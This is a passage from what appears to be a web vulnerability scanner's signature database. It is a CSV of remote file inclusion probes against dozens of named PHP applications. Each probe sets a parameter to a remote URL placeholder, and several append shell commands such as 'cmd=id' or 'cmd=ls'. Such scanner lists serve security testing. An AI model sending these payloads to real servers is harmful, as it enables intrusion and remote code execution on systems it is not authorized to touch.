(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005489\",\"5292\",\"c\",\"/mysave.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005490\",\"5292\",\"c\",\"/naboard_pnr.php?skin=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005491\",\"5292\",\"c\",\"/ncaster/admin/addons/archive/archive.php?adminfolder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005492\",\"5292\",\"c\",\"/network_module_selector.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005493\",\"5292\",\"c\",\"/news.php?CONFIG[script_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005494\",\"5292\",\"c\",\"/news.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005495\",\"5292\",\"c\",\"/news.php?scriptpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005496\",\"5292\",\"c\",\"/news.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005497\",\"5292\",\"c\",\"/news.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005498\",\"5292\",\"c\",\"/news/include/createdb.php?langfile;=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005499\",\"5292\",\"c\",\"/news/include/customize.php?l=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005500\",\"5292\",\"c\",\"/news/newstopic_inc.php?indir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005501\",\"5292\",\"c\",\"/news/scripts/news_page.php?script_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005502\",\"5292\",\"c\",\"/newsadmin.php?action=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005503\",\"5292\",\"c\",\"/newsarchive.php?path_to_script=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005504\",\"5292\",\"c\",\"/newsfeeds/includes/aggregator.php?zf_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005505\",\"5292\",\"c\",\"/newsfeeds/includes/controller.php?zf_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005506\",\"5292\",\"c\",\"/newsletter/newsletter.php?waroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005507\",\"5292\",\"c\",\"/newsp/lib/class.Database.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005508\",\"5292\",\"c\",\"/newticket.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005509\",\"5292\",\"c\",\"/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005510\",\"5292\",\"c\",\"/noticias.php?inc=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005511\",\"5292\",\"c\",\"/nucleus/plugins/skinfiles/index.php?DIR_LIBS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005512\",\"5292\",\"c\",\"/nuke_path/iframe.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005513\",\"5292\",\"c\",\"/nukebrowser.php?filnavn=@RFIURL&filhead=XXpathXX&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005514\",\"5292\",\"c\",\"/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005515\",\"5292\",\"c\",\"/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005516\",\"5292\",\"c\",\"/oaboard_en/forum.php?inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005517\",\"5292\",\"c\",\"/ocp-103/index.php?req_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005518\",\"5292\",\"c\",\"/ocs/include/footer.inc.php?fullpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005519\",\"5292\",\"c\",\"/ocs/include/theme.inc.php?fullpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005520\",\"5292\",\"c\",\"/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005521\",\"5292\",\"c\",\"/olbookmarks-0.7.4/themes/test1.php?@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005522\",\"5292\",\"c\",\"/oneadmin/adminfoot.php?path[docroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005523\",\"5292\",\"c\",\"/oneadmin/blogger/sampleblogger.php?path[docroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005524\",\"5292\",\"c\",\"/oneadmin/config-bak.php?include_once=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005525\",\"5292\",\"c\",\"/oneadmin/config.php?path[docroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005526\",\"5292\",\"c\",\"/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005527\",\"5292\",\"c\",\"/online.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005528\",\"5292\",\"c\",\"/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005529\",\"5292\",\"c\",\"/openi-admin/base/fileloader.php?config[openi_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005530\",\"5292\",\"c\",\"/openrat/themes/default/include/html/insert.inc.php?tpl_dir=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005531\",\"5292\",\"c\",\"/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005532\",\"5292\",\"c\",\"/ops/gals.php?news_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005533\",\"5292\",\"c\",\"/order/login.php?svr_rootscript=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005534\",\"5292\",\"c\",\"/osData/php121/php121db.php?php121dir=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005535\",\"5292\",\"c\",\"/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005536\",\"5292\",\"c\",\"/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005537\",\"5292\",\"c\",\"/owimg.php3?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005538\",\"5292\",\"c\",\"/p-news.php?pn_lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005539\",\"5292\",\"c\",\"/pafiledb/includes/pafiledb_constants.php?module_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005540\",\"5292\",\"c\",\"/page.php?goto=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005541\",\"5292\",\"c\",\"/page.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005542\",\"5292\",\"c\",\"/panel/common/theme/default/header_setup.php?path[docroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005543\",\"5292\",\"c\",\"/param_editor.php?folder=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005544\",\"5292\",\"c\",\"/parse/parser.php?WN_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005545\",\"5292\",\"c\",\"/patch/?language_id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005546\",\"5292\",\"c\",\"/patch/tools/send_reminders.php?noSet=0&includedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005547\",\"5292\",\"c\",\"/paypalipn/ipnprocess.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005548\",\"5292\",\"c\",\"/pda/pda_projects.php?offset=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005549\",\"5292\",\"c\",\"/phfito/phfito-post?SRC_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005550\",\"5292\",\"c\",\"/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005551\",\"5292\",\"c\",\"/photo_comment.php?toroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005552\",\"5292\",\"c\",\"/php-inc/log.inc.php?SKIN_URL=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005553\",\"5292\",\"c\",\"/php-include-robotsservices.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005554\",\"5292\",\"c\",\"/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005555\",\"5292\",\"c\",\"/php.incs/common.inc.php?cm_basedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005556\",\"5292\",\"c\",\"/php/init.gallery.php?include_class=@RFIURL/something\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005557\",\"5292\",\"c\",\"/php121db.php?php121dir=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005558\",\"5292\",\"c\",\"/php4you.php?dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005559\",\"5292\",\"c\",\"/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005560\",\"5292\",\"c\",\"/phpBB2/shoutbox.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005561\",\"5292\",\"c\",\"/phpCards.header.php?CardPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005562\",\"5292\",\"c\",\"/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005563\",\"5292\",\"c\",\"/phpMyChat.php3?=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005564\",\"5292\",\"c\",\"/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005565\",\"5292\",\"c\",\"/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005566\",\"5292\",\"c\",\"/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005567\",\"5292\",\"c\",\"/phpbb/sendmsg.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005568\",\"5292\",\"c\",\"/phpcalendar/includes/calendar.php?phpc_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005569\",\"5292\",\"c\",\"/phpcalendar/includes/setup.php?phpc_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005570\",\"5292\",\"c\",\"/phpdebug_PATH/test/debug_test.php?debugClassLocation=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005571\",\"5292\",\"c\",\"/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005572\",\"5292\",\"c\",\"/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005573\",\"5292\",\"c\",\"/phphd_downloads/common.php?phphd_real_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005574\",\"5292\",\"c\",\"/phphost_directoryv2/include/admin.php?rd=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005575\",\"5292\",\"c\",\"/phphtml.php?htmlclass_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005576\",\"5292\",\"c\",\"/phpi/edit_top_feature.php?include_connection=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005577\",\"5292\",\"c\",\"/phpi/edit_topics_feature.php?include_connection=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005578\",\"5292\",\"c\",\"/phplib/site_conf.php?ordnertiefe=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005579\",\"5292\",\"c\",\"/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005580\",\"5292\",\"c\",\"/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005581\",\"5292\",\"c\",\"/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005582\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005583\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005584\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005585\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/referenz.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005586\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005587\",\"5292\",\"c\",\"/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005588\",\"5292\",\"c\",\"/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005589\",\"5292\",\"c\",\"/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005590\",\"5292\",\"c\",\"/phplinks/includes/smarty.php?full_path_to_public_program=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005591\",\"5292\",\"c\",\"/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005592\",\"5292\",\"c\",\"/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005593\",\"5292\",\"c\",\"/phppc/poll.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005594\",\"5292\",\"c\",\"/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005595\",\"5292\",\"c\",\"/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005596\",\"5292\",\"c\",\"/phpquickgallery/gallery_top.inc.php?textFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005597\",\"5292\",\"c\",\"/phpreactor/inc/polls.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005598\",\"5292\",\"c\",\"/phpreactor/inc/updatecms.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005599\",\"5292\",\"c\",\"/phpreactor/inc/users.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005600\",\"5292\",\"c\",\"/phpreactor/inc/view.inc.php?pathtohomedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005601\",\"5292\",\"c\",\"/phpress/adisplay.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005602\",\"5292\",\"c\",\"/phpunity-postcard.php?plgallery_epost=1&gallery_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 